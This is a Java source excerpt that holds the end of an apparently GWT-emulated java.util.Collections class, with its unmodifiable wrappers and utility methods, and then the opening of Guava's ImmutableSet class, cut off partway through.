extends T> c) { throw new UnsupportedOperationException(); } @Override public void clear() { throw new UnsupportedOperationException(); } @Override public boolean contains(Object o) { return coll.contains(o); } @Override public boolean containsAll(Collection<?> c) { return coll.containsAll(c); } @Override public boolean isEmpty() { return coll.isEmpty(); } @Override public Iterator<T> iterator() { return new UnmodifiableCollectionIterator<T>(coll.iterator()); } @Override public boolean remove(Object o) { throw new UnsupportedOperationException(); } @Override public boolean removeAll(Collection<?> c) { throw new UnsupportedOperationException(); } @Override public boolean retainAll(Collection<?> c) { throw new UnsupportedOperationException(); } @Override public boolean removeIf(Predicate<? super T> p) { throw new UnsupportedOperationException(); } @Override public int size() { return coll.size(); } @Override public Object[] toArray() { return coll.toArray(); } @Override public <E> E[] toArray(E[] a) { return coll.toArray(a); } @Override public String toString() { return coll.toString(); } } static class UnmodifiableList<T> extends UnmodifiableCollection<T> implements List<T> { private final List<? extends T> list; public UnmodifiableList(List<? extends T> list) { super(list); this.list = list; } @Override public void add(int index, T element) { throw new UnsupportedOperationException(); } @Override public boolean addAll(int index, Collection<? 
extends T> c) { throw new UnsupportedOperationException(); } @Override public boolean equals(Object o) { return list.equals(o); } @Override public T get(int index) { return list.get(index); } @Override public int hashCode() { return list.hashCode(); } @Override public int indexOf(Object o) { return list.indexOf(o); } @Override public boolean isEmpty() { return list.isEmpty(); } @Override public int lastIndexOf(Object o) { return list.lastIndexOf(o); } @Override public ListIterator<T> listIterator() { return listIterator(0); } @Override public ListIterator<T> listIterator(int from) { return new UnmodifiableListIterator<T>(list.listIterator(from)); } @Override public void replaceAll(UnaryOperator<T> operator) { throw new UnsupportedOperationException(); } @Override public void sort(Comparator<? super T> c) { throw new UnsupportedOperationException(); } @Override public T remove(int index) { throw new UnsupportedOperationException(); } @Override public T set(int index, T element) { throw new UnsupportedOperationException(); } @Override @JsNonNull public List<T> subList(int fromIndex, int toIndex) { return new UnmodifiableList<T>(list.subList(fromIndex, toIndex)); } } static class UnmodifiableMap<K, V> implements Map<K, V> { static class UnmodifiableEntrySet<K, V> extends UnmodifiableSet<Map.Entry<K, V>> { private static class UnmodifiableEntry<K, V> implements Map.Entry<K, V> { private Map.Entry<? extends K, ? extends V> entry; public UnmodifiableEntry(Map.Entry<? extends K, ? 
extends V> entry) { this.entry = entry; } @Override public boolean equals(Object o) { return entry.equals(o); } @Override public K getKey() { return entry.getKey(); } @Override public V getValue() { return entry.getValue(); } @Override public int hashCode() { return entry.hashCode(); } @Override public V setValue(V value) { throw new UnsupportedOperationException(); } @Override public String toString() { return entry.toString(); } } @SuppressWarnings("unchecked") public UnmodifiableEntrySet(Set<? extends Map.Entry<? extends K, ? extends V>> s) { super((Set<? extends Entry<K, V>>) s); } @Override public boolean contains(Object o) { return coll.contains(o); } @Override public boolean containsAll(Collection<?> o) { return coll.containsAll(o); } @Override @SuppressWarnings("unchecked") public Iterator<Map.Entry<K, V>> iterator() { final Iterator<Map.Entry<K, V>> it = (Iterator<Entry<K, V>>) coll.iterator(); return new Iterator<Map.Entry<K, V>>() { @Override public boolean hasNext() { return it.hasNext(); } @Override public Map.Entry<K, V> next() { return new UnmodifiableEntry<K, V>(it.next()); } @Override public void remove() { throw new UnsupportedOperationException(); } }; } @Override public Object[] toArray() { Object[] array = super.toArray(); wrap(array, array.length); return array; } @Override @SuppressWarnings("unchecked") public <T> T[] toArray(T[] a) { Object[] result = super.toArray(a); wrap(result, coll.size()); return (T[]) result; } /** * Wrap an array of Map.Entries as UnmodifiableEntries. * * @param array array to wrap * @param size number of entries to wrap */ @SuppressWarnings("unchecked") private void wrap(Object[] array, int size) { for (int i = 0; i < size; ++i) { array[i] = new UnmodifiableEntry<K, V>((Map.Entry<K, V>) array[i]); } } } private UnmodifiableSet<Map.Entry<K, V>> entrySet; private UnmodifiableSet<K> keySet; private final Map<? extends K, ? extends V> map; private UnmodifiableCollection<V> values; public UnmodifiableMap(Map<? 
extends K, ? extends V> map) { this.map = map; } @Override public void clear() { throw new UnsupportedOperationException(); } @Override public boolean containsKey(Object key) { return map.containsKey(key); } @Override public boolean containsValue(Object val) { return map.containsValue(val); } @Override public Set<Map.Entry<K, V>> entrySet() { if (entrySet == null) { entrySet = new UnmodifiableEntrySet<K, V>(map.entrySet()); } return entrySet; } @Override public boolean equals(Object o) { return map.equals(o); } @Override public V get(Object key) { return map.get(key); } @Override public int hashCode() { return map.hashCode(); } @Override public boolean isEmpty() { return map.isEmpty(); } @Override @JsNonNull public Set<K> keySet() { if (keySet == null) { keySet = new UnmodifiableSet<K>(map.keySet()); } return keySet; } @Override public V put(K key, V value) { throw new UnsupportedOperationException(); } @Override public void putAll(Map<? extends K, ? extends V> t) { throw new UnsupportedOperationException(); } @Override public V remove(Object key) { throw new UnsupportedOperationException(); } @Override public int size() { return map.size(); } @Override public String toString() { return map.toString(); } @Override public @JsNonNull Collection<V> values() { if (values == null) { values = new UnmodifiableCollection<V>(map.values()); } return values; } } static class UnmodifiableRandomAccessList<T> extends UnmodifiableList<T> implements RandomAccess { public UnmodifiableRandomAccessList(List<? extends T> list) { super(list); } } static class UnmodifiableSet<T> extends UnmodifiableCollection<T> implements Set<T> { public UnmodifiableSet(Set<? extends T> set) { super(set); } @Override public boolean equals(Object o) { return coll.equals(o); } @Override public int hashCode() { return coll.hashCode(); } } static class UnmodifiableSortedMap<K, V> extends UnmodifiableMap<K, V> implements SortedMap<K, V> { private SortedMap<K, ? 
extends V> sortedMap; public UnmodifiableSortedMap(SortedMap<K, ? extends V> sortedMap) { super(sortedMap); this.sortedMap = sortedMap; } @Override public Comparator<? super K> comparator() { return sortedMap.comparator(); } @Override public boolean equals(Object o) { return sortedMap.equals(o); } @Override public K firstKey() { return sortedMap.firstKey(); } @Override public int hashCode() { return sortedMap.hashCode(); } @Override public SortedMap<K, V> headMap(K toKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.headMap(toKey)); } @Override public K lastKey() { return sortedMap.lastKey(); } @Override public SortedMap<K, V> subMap(K fromKey, K toKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.subMap(fromKey, toKey)); } @Override public SortedMap<K, V> tailMap(K fromKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.tailMap(fromKey)); } } static class UnmodifiableSortedSet<E> extends UnmodifiableSet<E> implements SortedSet<E> { private SortedSet<E> sortedSet; @SuppressWarnings("unchecked") public UnmodifiableSortedSet(SortedSet<? extends E> sortedSet) { super(sortedSet); this.sortedSet = (SortedSet<E>) sortedSet; } @Override public Comparator<? super E> comparator() { return sortedSet.comparator(); } @Override public boolean equals(Object o) { return sortedSet.equals(o); } @Override public E first() { return sortedSet.first(); } @Override public int hashCode() { return sortedSet.hashCode(); } @Override public SortedSet<E> headSet(E toElement) { return new UnmodifiableSortedSet<E>(sortedSet.headSet(toElement)); } @Override public E last() { return sortedSet.last(); } @Override public SortedSet<E> subSet(E fromElement, E toElement) { return new UnmodifiableSortedSet<E>(sortedSet.subSet(fromElement, toElement)); } @Override public SortedSet<E> tailSet(E fromElement) { return new UnmodifiableSortedSet<E>(sortedSet.tailSet(fromElement)); } } private static class UnmodifiableCollectionIterator<T> implements Iterator<T> { private final Iterator<? 
extends T> it; private UnmodifiableCollectionIterator(Iterator<? extends T> it) { this.it = it; } @Override public boolean hasNext() { return it.hasNext(); } @Override public T next() { return it.next(); } @Override public void remove() { throw new UnsupportedOperationException(); } } private static class UnmodifiableListIterator<T> extends UnmodifiableCollectionIterator<T> implements ListIterator<T> { private final ListIterator<? extends T> lit; private UnmodifiableListIterator(ListIterator<? extends T> lit) { super(lit); this.lit = lit; } @Override public void add(T o) { throw new UnsupportedOperationException(); } @Override public boolean hasPrevious() { return lit.hasPrevious(); } @Override public int nextIndex() { return lit.nextIndex(); } @Override public T previous() { return lit.previous(); } @Override public int previousIndex() { return lit.previousIndex(); } @Override public void set(T o) { throw new UnsupportedOperationException(); } } private static class RandomHolder { private static final Random rnd = new Random(); } @SuppressWarnings("unchecked") public static final List EMPTY_LIST = new EmptyList(); @SuppressWarnings("unchecked") public static final Map EMPTY_MAP = new EmptyMap(); @SuppressWarnings("unchecked") public static final Set EMPTY_SET = new EmptySet(); public static <T> boolean addAll(Collection<? super T> c, T... a) { boolean result = false; for (T e : a) { result |= c.add(e); } return result; } public static <T> Queue<T> asLifoQueue(Deque<T> deque) { return new LifoQueue<T>(deque); } /** * Perform a binary search on a sorted List, using natural ordering. * * <p>Note: The GWT implementation differs from the JDK implementation in that it does not do an * iterator-based binary search for Lists that do not implement RandomAccess. 
* * @param sortedList object array to search * @param key value to search for * @return the index of an element with a matching value, or a negative number which is the index * of the next larger value (or just past the end of the array if the searched value is larger * than all elements in the array) minus 1 (to ensure error returns are negative) * @throws ClassCastException if <code>key</code> is not comparable to <code>sortedList</code>'s * elements. */ public static <T> int binarySearch( final List<? extends Comparable<? super T>> sortedList, final T key) { return binarySearch(sortedList, key, null); } /* * These methods are commented out because they cannot currently be * implemented in GWT. The signatures are included in case that changes. */ // public static <E> Collection<E> checkedCollection(Collection<E> c, Class<E> // type) { // // FUTURE: implement // return null; // } // // static <E> List<E> checkedList(List<E> list, Class<E> type) { // // FUTURE: implement // return null; // } // // public static <K,V> Map<K,V> checkedMap(Map<K,V> list, Class<K> keyType, // Class<V> valueType) { // // FUTURE: implement // return null; // } // // public static <E> Set<E> checkedSet(Set<E> list, Class<E> type) { // // FUTURE: implement // return null; // } // // public static <K,V> SortedMap<K,V> checkedSortedMap(SortedMap<K,V> m, // Class<K> keyType, Class<V> valueType) { // // FUTURE: implement // return null; // } // // public static <E> SortedSet<E> checkedSortedSet(SortedSet<E> list, Class<E> // type) { // // FUTURE: implement // return null; // } /** * Perform a binary search on a sorted List, using a user-specified comparison function. * * <p>Note: The GWT implementation differs from the JDK implementation in that it does not do an * iterator-based binary search for Lists that do not implement RandomAccess. 
 *
 * @param sortedList List to search
 * @param key value to search for
 * @param comparator comparison function, <code>null</code> indicates <i>natural ordering</i>
 *     should be used.
 * @return the index of an element with a matching value, or a negative number which is the index
 *     of the next larger value (or just past the end of the array if the searched value is larger
 *     than all elements in the array) minus 1 (to ensure error returns are negative)
 * @throws ClassCastException if <code>key</code> and <code>sortedList</code>'s elements cannot be
 *     compared by <code>comparator</code>.
 */
public static <T> int binarySearch(
    final List<? extends T> sortedList, final T key, Comparator<? super T> comparator) {
  /*
   * TODO: This doesn't implement the "iterator-based binary search" described
   * in the JDK docs for non-RandomAccess Lists. Until GWT provides a
   * LinkedList, this shouldn't be an issue.
   */
  comparator = Comparators.nullToNaturalOrder(comparator);
  int low = 0;
  int high = sortedList.size() - 1;

  while (low <= high) {
    // Overflow-safe midpoint computation (avoids (low + high) / 2).
    final int mid = low + ((high - low) >> 1);
    final T midVal = sortedList.get(mid);
    final int compareResult = comparator.compare(midVal, key);

    if (compareResult < 0) {
      low = mid + 1;
    } else if (compareResult > 0) {
      high = mid - 1;
    } else {
      // key found
      return mid;
    }
  }
  // key not found: -(insertionPoint) - 1, since low is the insertion point here.
  return -low - 1;
}

/**
 * Overwrites the leading elements of {@code dest} with the elements of {@code src},
 * in order; {@code dest} must be at least as large as {@code src}.
 */
public static <T> void copy(List<? super T> dest, List<? extends T> src) {
  if (src.size() > dest.size()) {
    throw new IndexOutOfBoundsException("src does not fit in dest");
  }
  ListIterator<? super T> destIt = dest.listIterator();
  for (T e : src) {
    destIt.next();
    destIt.set(e);
  }
}

/** Returns true if the two collections have no element in common. */
public static boolean disjoint(Collection<?> c1, Collection<?> c2) {
  Collection<?> iterating = c1;
  Collection<?> testing = c2;

  // See if one of these objects possibly implements a fast contains.
if ((c1 instanceof Set) && !(c2 instanceof Set)) { iterating = c2; testing = c1; } for (Object o : iterating) { if (testing.contains(o)) { return false; } } return true; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> Iterator<T> emptyIterator() { return (Iterator<T>) EmptyListIterator.INSTANCE; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> List<T> emptyList() { return (List<T>) EMPTY_LIST; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> ListIterator<T> emptyListIterator() { return (ListIterator<T>) EmptyListIterator.INSTANCE; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <K, V> Map<K, V> emptyMap() { return (Map<K, V>) EMPTY_MAP; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> Set<T> emptySet() { return (Set<T>) EMPTY_SET; } public static <T> Enumeration<T> enumeration(Collection<T> c) { final Iterator<T> it = c.iterator(); return new Enumeration<T>() { @Override public boolean hasMoreElements() { return it.hasNext(); } @Override public T nextElement() { return it.next(); } }; } public static <T> void fill(List<? super T> list, T obj) { for (ListIterator<? super T> it = list.listIterator(); it.hasNext(); ) { it.next(); it.set(obj); } } public static int frequency(Collection<?> c, Object o) { int count = 0; for (Object e : c) { if (Objects.equals(o, e)) { ++count; } } return count; } public static <T> ArrayList<T> list(Enumeration<T> e) { ArrayList<T> arrayList = new ArrayList<T>(); while (e.hasMoreElements()) { arrayList.add(e.nextElement()); } return arrayList; } public static <T extends Object & Comparable<? super T>> T max(Collection<? extends T> coll) { return max(coll, null); } public static <T> T max(Collection<? extends T> coll, Comparator<? super T> comp) { comp = Comparators.nullToNaturalOrder(comp); Iterator<? extends T> it = coll.iterator(); // Will throw NoSuchElementException if coll is empty. 
T max = it.next(); while (it.hasNext()) { T t = it.next(); if (comp.compare(t, max) > 0) { max = t; } } return max; } public static <T extends Object & Comparable<? super T>> T min(Collection<? extends T> coll) { return min(coll, null); } public static <T> T min(Collection<? extends T> coll, Comparator<? super T> comp) { return max(coll, reverseOrder(comp)); } public static <E> Set<E> newSetFromMap(Map<E, Boolean> map) { checkArgument(map.isEmpty(), "map is not empty"); return new SetFromMap<E>(map); } public static <T> List<T> nCopies(int n, T o) { T[] array = (T[]) new Object[n]; if (o != null) { Arrays.fill(array, o); } return unmodifiableList(Arrays.asList(array)); } public static <T> boolean replaceAll(List<T> list, T oldVal, T newVal) { boolean modified = false; for (ListIterator<T> it = list.listIterator(); it.hasNext(); ) { T t = it.next(); if (Objects.equals(t, oldVal)) { it.set(newVal); modified = true; } } return modified; } @SuppressWarnings("unchecked") public static void reverse(List<?> l) { if (l instanceof RandomAccess) { for (int iFront = 0, iBack = l.size() - 1; iFront < iBack; ++iFront, --iBack) { Collections.swap(l, iFront, iBack); } } else { ListIterator head = l.listIterator(); ListIterator tail = l.listIterator(l.size()); while (head.nextIndex() < tail.previousIndex()) { Object headElem = head.next(); Object tailElem = tail.previous(); head.set(tailElem); tail.set(headElem); } } } @SuppressWarnings("unchecked") public static <T> Comparator<T> reverseOrder() { return (Comparator<T>) Comparator.reverseOrder(); } public static <T> Comparator<T> reverseOrder(Comparator<T> cmp) { return cmp == null ? reverseOrder() : cmp.reversed(); } /** * Rotates the elements in {@code list} by the distance {@code dist} * * <p>e.g. 
for a given list with elements [1, 2, 3, 4, 5, 6, 7, 8, 9, 0], calling rotate(list, 3) * or rotate(list, -7) would modify the list to look like this: [8, 9, 0, 1, 2, 3, 4, 5, 6, 7] * * @param lst the list whose elements are to be rotated. * @param dist is the distance the list is rotated. This can be any valid integer. Negative values * rotate the list backwards. */ @SuppressWarnings("unchecked") public static void rotate(List<?> lst, int dist) { checkNotNull(lst); int size = lst.size(); // Rotating an empty collection results in the same empty collection if (size == 0) { return; } // Normalize the distance int normdist = dist % size; if (normdist == 0) { return; } // Transform a rotation to the left into the equivalent rotation to the right. if (normdist < 0) { normdist += size; } if (lst instanceof RandomAccess) { List<Object> list = (List<Object>) lst; // Move each element to the new location. Object temp = list.get(0); int index = 0, beginIndex = 0; for (int i = 0; i < size; i++) { index = (index + normdist) % size; temp = list.set(index, temp); if (index == beginIndex) { index = ++beginIndex; temp = list.get(beginIndex); } } } else { int divideIndex = size - normdist; List<?> sublist1 = lst.subList(0, divideIndex); List<?> sublist2 = lst.subList(divideIndex, size); reverse(sublist1); reverse(sublist2); reverse(lst); } } public static void shuffle(List<?> list) { shuffle(list, RandomHolder.rnd); } @SuppressWarnings("unchecked") public static void shuffle(List<?> list, Random rnd) { if (list instanceof RandomAccess) { for (int i = list.size() - 1; i >= 1; i--) { swapImpl(list, i, rnd.nextInt(i + 1)); } } else { Object arr[] = list.toArray(); for (int i = arr.length - 1; i >= 1; i--) { swapImpl(arr, i, rnd.nextInt(i + 1)); } ListIterator it = list.listIterator(); for (Object e : arr) { it.next(); it.set(e); } } } public static <T> Set<T> singleton(T o) { HashSet<T> set = new HashSet<T>(1); set.add(o); return unmodifiableSet(set); } // TODO(tobyr) Is it worth 
creating custom singleton sets, lists, and maps? // More efficient at runtime, but more code bloat to download public static <T> List<T> singletonList(T o) { return new SingletonList<T>(o); } public static <K, V> Map<K, V> singletonMap(K key, V value) { Map<K, V> map = new HashMap<K, V>(1); map.put(key, value); return unmodifiableMap(map); } public static <T> void sort(List<T> target) { target.sort(null); } public static <T> void sort(List<T> target, Comparator<? super T> c) { target.sort(c); } public static void swap(List<?> list, int i, int j) { swapImpl(list, i, j); } public static <T> Collection<T> unmodifiableCollection(final Collection<? extends T> coll) { return new UnmodifiableCollection<T>(coll); } public static <T> List<T> unmodifiableList(List<? extends T> list) { return (list instanceof RandomAccess) ? new UnmodifiableRandomAccessList<T>(list) : new UnmodifiableList<T>(list); } static <E> List<E> internalListOf(E[] elements) { if (isApiChecked()) { for (int i = 0; i < elements.length; i++) { checkNotNull(elements[i]); } } return new UnmodifiableRandomAccessList<E>( elements.length == 0 ? emptyList() : Arrays.asList(elements)); } static <E> Set<E> internalSetOf(E[] elements, boolean allowDuplicates) { if (elements.length == 0) { return Collections.unmodifiableSet(emptySet()); } Set<E> set = new HashSet<>(); for (int i = 0; i < elements.length; i++) { boolean added = set.add(checkNotNull(elements[i])); if (!allowDuplicates) { checkArgument(added, "Duplicate element"); } } return Collections.unmodifiableSet(set); } // Marked as JsMethod to take advantage of JS varargs. @JsMethod static <K, V> Map<K, V> internalMapOf(Object... 
elements) { if (elements.length == 0) { return Collections.unmodifiableMap(emptyMap()); } Map<K, V> map = new HashMap<>(); for (int i = 0; i < elements.length; i = i + 2) { V old = map.put((K) checkNotNull(elements[i]), (V) checkNotNull(elements[i + 1])); checkArgument(old == null, "Duplicate element"); } return Collections.unmodifiableMap(map); } static <K, V> Map<K, V> internalMapFromEntries( Collection<? extends Entry<? extends K, ? extends V>> entries) { if (entries.isEmpty()) { return Collections.unmodifiableMap(emptyMap()); } Map<K, V> map = new HashMap<>(); for (Entry<? extends K, ? extends V> entry : entries) { checkNotNull(entry); V old = map.put(checkNotNull(entry.getKey()), checkNotNull(entry.getValue())); checkArgument(old == null, "Duplicate element"); } return Collections.unmodifiableMap(map); } public static <K, V> Map<K, V> unmodifiableMap(final Map<? extends K, ? extends V> map) { return new UnmodifiableMap<K, V>(map); } public static <T> Set<T> unmodifiableSet(Set<? extends T> set) { return new UnmodifiableSet<T>(set); } public static <K, V> SortedMap<K, V> unmodifiableSortedMap(SortedMap<K, ? extends V> map) { return new UnmodifiableSortedMap<K, V>(map); } public static <T> SortedSet<T> unmodifiableSortedSet(SortedSet<T> set) { return new UnmodifiableSortedSet<T>(set); } /** Computes hash code without preserving elements order (e.g. HashSet). */ static <T> int hashCode(Iterable<T> collection) { int hashCode = 0; for (T e : collection) { hashCode = hashCode + Objects.hashCode(e); } return hashCode; } /** Computes hash code preserving collection order (e.g. ArrayList). 
*/ static <T> int hashCode(List<T> list) { int hashCode = 1; for (T e : list) { hashCode = 31 * hashCode + Objects.hashCode(e); } return hashCode; } private static <T> void swapImpl(List<T> list, int i, int j) { T t = list.get(i); list.set(i, list.get(j)); list.set(j, t); } private static void swapImpl(Object[] a, int i, int j) { Object obj = a[i]; a[i] = a[j]; a[j] = obj; } private Collections() {} }
// ---- Begin concatenated file: guava/src/com/google/common/collect/ImmutableSet.java
// ---- (repo: google/guava, size: 36,011 bytes) — stray dataset rows preserved as a comment.
/* * Copyright (C) 2007 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.collect; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.CollectPreconditions.checkNonnegative; import static com.google.common.collect.ImmutableList.asImmutableList; import static com.google.common.math.IntMath.sqrt; import static java.lang.Math.max; import static java.util.Objects.requireNonNull; import com.google.common.annotations.GwtCompatible; import com.google.common.annotations.GwtIncompatible; import com.google.common.annotations.J2ktIncompatible; import com.google.common.annotations.VisibleForTesting; import com.google.common.math.IntMath; import com.google.common.primitives.Ints; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.errorprone.annotations.concurrent.LazyInit; import com.google.j2objc.annotations.RetainedWith; import java.io.InvalidObjectException; import java.io.ObjectInputStream; import java.io.Serializable; import java.math.RoundingMode; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.EnumSet; import java.util.Iterator; import java.util.Set; import java.util.SortedSet; import java.util.Spliterator; import java.util.function.Consumer; import java.util.stream.Collector; import org.jspecify.annotations.Nullable; /** * A {@link Set} whose 
contents will never change, with many other important properties detailed at
 * {@link ImmutableCollection}.
 *
 * @since 2.0
 */
@GwtCompatible
@SuppressWarnings("serial") // we're overriding default serialization
public abstract class ImmutableSet<E> extends ImmutableCollection<E> implements Set<E> {
  // Immutable-set spliterators additionally report DISTINCT.
  static final int SPLITERATOR_CHARACTERISTICS =
      ImmutableCollection.SPLITERATOR_CHARACTERISTICS | Spliterator.DISTINCT;

  /**
   * Returns a {@code Collector} that accumulates the input elements into a new {@code
   * ImmutableSet}. Elements appear in the resulting set in the encounter order of the stream; if
   * the stream contains duplicates (according to {@link Object#equals(Object)}), only the first
   * duplicate in encounter order will appear in the result.
   *
   * @since 21.0
   */
  public static <E> Collector<E, ?, ImmutableSet<E>> toImmutableSet() {
    return CollectCollectors.toImmutableSet();
  }

  /**
   * Returns the empty immutable set. Preferred over {@link Collections#emptySet} for code
   * consistency, and because the return type conveys the immutability guarantee.
   *
   * <p><b>Performance note:</b> the instance returned is a singleton.
   */
  @SuppressWarnings({"unchecked"}) // fully variant implementation (never actually produces any Es)
  public static <E> ImmutableSet<E> of() {
    return (ImmutableSet<E>) RegularImmutableSet.EMPTY;
  }

  /**
   * Returns an immutable set containing the given element. Preferred over {@link
   * Collections#singleton} for code consistency, {@code null} rejection, and because the return
   * type conveys the immutability guarantee.
   */
  public static <E> ImmutableSet<E> of(E e1) {
    return new SingletonImmutableSet<>(e1);
  }

  /*
   * TODO: b/315526394 - Skip the Builder entirely for the of(...) methods, since we don't need to
   * worry that we might trigger the fallback to the JDK-backed implementation? (The varargs one
   * _could_, so we could keep it as it is. Or we could convince ourselves that hash flooding is
   * unlikely in practice there, too.)
   */

  /**
   * Returns an immutable set containing the given elements, minus duplicates, in the order each was
   * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except
   * the first are ignored.
   */
  public static <E> ImmutableSet<E> of(E e1, E e2) {
    return new RegularSetBuilderImpl<E>(2).add(e1).add(e2).review().build();
  }

  /**
   * Returns an immutable set containing the given elements, minus duplicates, in the order each was
   * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except
   * the first are ignored.
   */
  public static <E> ImmutableSet<E> of(E e1, E e2, E e3) {
    return new RegularSetBuilderImpl<E>(3).add(e1).add(e2).add(e3).review().build();
  }

  /**
   * Returns an immutable set containing the given elements, minus duplicates, in the order each was
   * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except
   * the first are ignored.
   */
  public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4) {
    return new RegularSetBuilderImpl<E>(4).add(e1).add(e2).add(e3).add(e4).review().build();
  }

  /**
   * Returns an immutable set containing the given elements, minus duplicates, in the order each was
   * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except
   * the first are ignored.
   */
  public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4, E e5) {
    return new RegularSetBuilderImpl<E>(5).add(e1).add(e2).add(e3).add(e4).add(e5).review().build();
  }

  /**
   * Returns an immutable set containing the given elements, minus duplicates, in the order each was
   * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except
   * the first are ignored.
   *
   * <p>The array {@code others} must not be longer than {@code Integer.MAX_VALUE - 6}.
   *
   * @since 3.0 (source-compatible since 2.0)
   */
  @SafeVarargs // For Eclipse. For internal javac we have disabled this pointless type of warning.
  public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4, E e5, E e6, E... others) {
    checkArgument(
        others.length <= Integer.MAX_VALUE - 6, "the total number of elements must fit in an int");
    SetBuilderImpl<E> builder = new RegularSetBuilderImpl<>(6 + others.length);
    builder = builder.add(e1).add(e2).add(e3).add(e4).add(e5).add(e6);
    for (int i = 0; i < others.length; i++) {
      builder = builder.add(others[i]);
    }
    return builder.review().build();
  }

  /**
   * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order
   * each appears first in the source collection.
   *
   * <p><b>Performance note:</b> This method will sometimes recognize that the actual copy operation
   * is unnecessary; for example, {@code copyOf(copyOf(anArrayList))} will copy the data only once.
   * This reduces the expense of habitually making defensive copies at API boundaries. However, the
   * precise conditions for skipping the copy operation are undefined.
   *
   * @throws NullPointerException if any of {@code elements} is null
   * @since 7.0 (source-compatible since 2.0)
   */
  public static <E> ImmutableSet<E> copyOf(Collection<? extends E> elements) {
    /*
     * TODO(lowasser): consider checking for ImmutableAsList here
     * TODO(lowasser): consider checking for Multiset here
     */
    // Don't refer to ImmutableSortedSet by name so it won't pull in all that code
    if (elements instanceof ImmutableSet && !(elements instanceof SortedSet)) {
      @SuppressWarnings("unchecked") // all supported methods are covariant
      ImmutableSet<E> set = (ImmutableSet<E>) elements;
      if (!set.isPartialView()) {
        return set;
      }
    } else if (elements instanceof EnumSet) {
      EnumSet<?> clone = ((EnumSet<?>) elements).clone();
      ImmutableSet<?> untypedResult = ImmutableEnumSet.asImmutable(clone);
      /*
       * The result has the same type argument we started with. We just couldn't express EnumSet<E>
       * or ImmutableEnumSet<E> along the way because our own <E> isn't <E extends Enum<E>>.
       */
      @SuppressWarnings("unchecked")
      ImmutableSet<E> result = (ImmutableSet<E>) untypedResult;
      return result;
    }
    if (elements.isEmpty()) {
      // We avoid allocating anything.
      return of();
    }
    // Collection<E>.toArray() is required to contain only E instances, and all we do is read them.
    // TODO(cpovirk): Consider using Object[] anyway.
    @SuppressWarnings("unchecked")
    E[] array = (E[]) elements.toArray();
    /*
     * For a Set, we guess that it contains no duplicates. That's just a guess for purpose of
     * sizing; if the Set uses different equality semantics, it might contain duplicates according
     * to equals(), and we will deduplicate those properly, albeit at some cost in allocations.
     */
    int expectedSize =
        elements instanceof Set ? array.length : estimatedSizeForUnknownDuplication(array.length);
    return fromArrayWithExpectedSize(array, expectedSize);
  }

  /**
   * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order
   * each appears first in the source iterable. This method iterates over {@code elements} only
   * once.
   *
   * <p><b>Performance note:</b> This method will sometimes recognize that the actual copy operation
   * is unnecessary; for example, {@code copyOf(copyOf(anArrayList))} should copy the data only
   * once. This reduces the expense of habitually making defensive copies at API boundaries.
   * However, the precise conditions for skipping the copy operation are undefined.
   *
   * @throws NullPointerException if any of {@code elements} is null
   */
  public static <E> ImmutableSet<E> copyOf(Iterable<? extends E> elements) {
    return (elements instanceof Collection)
        ? copyOf((Collection<? extends E>) elements)
        : copyOf(elements.iterator());
  }

  /**
   * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order
   * each appears first in the source iterator.
   *
   * @throws NullPointerException if any of {@code elements} is null
   */
  public static <E> ImmutableSet<E> copyOf(Iterator<? extends E> elements) {
    // We special-case for 0 or 1 elements, but anything further is madness.
    if (!elements.hasNext()) {
      return of();
    }
    E first = elements.next();
    if (!elements.hasNext()) {
      return of(first);
    } else {
      return new ImmutableSet.Builder<E>().add(first).addAll(elements).build();
    }
  }

  /**
   * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order
   * each appears first in the source array.
   *
   * @throws NullPointerException if any of {@code elements} is null
   * @since 3.0
   */
  public static <E> ImmutableSet<E> copyOf(E[] elements) {
    return fromArrayWithExpectedSize(elements, estimatedSizeForUnknownDuplication(elements.length));
  }

  // Shared tail of the copyOf() family: dedupe via a builder sized to expectedSize.
  private static <E> ImmutableSet<E> fromArrayWithExpectedSize(E[] elements, int expectedSize) {
    switch (elements.length) {
      case 0:
        return of();
      case 1:
        return of(elements[0]);
      default:
        SetBuilderImpl<E> builder = new RegularSetBuilderImpl<>(expectedSize);
        for (int i = 0; i < elements.length; i++) {
          builder = builder.add(elements[i]);
        }
        return builder.review().build();
    }
  }

  ImmutableSet() {}

  /** Returns {@code true} if the {@code hashCode()} method runs quickly. */
  boolean isHashCodeFast() {
    return false;
  }

  @Override
  public boolean equals(@Nullable Object object) {
    if (object == this) {
      return true;
    }
    // Two sets whose hash codes are cheap to compute and disagree cannot be equal.
    if (object instanceof ImmutableSet
        && isHashCodeFast()
        && ((ImmutableSet<?>) object).isHashCodeFast()
        && hashCode() != object.hashCode()) {
      return false;
    }
    return Sets.equalsImpl(this, object);
  }

  @Override
  public int hashCode() {
    return Sets.hashCodeImpl(this);
  }

  // This declaration is needed to make Set.iterator() and
  // ImmutableCollection.iterator() consistent.
@Override
  public abstract UnmodifiableIterator<E> iterator();

  // Partial implementation that lazily creates and caches its asList() view.
  abstract static class CachingAsList<E> extends ImmutableSet<E> {
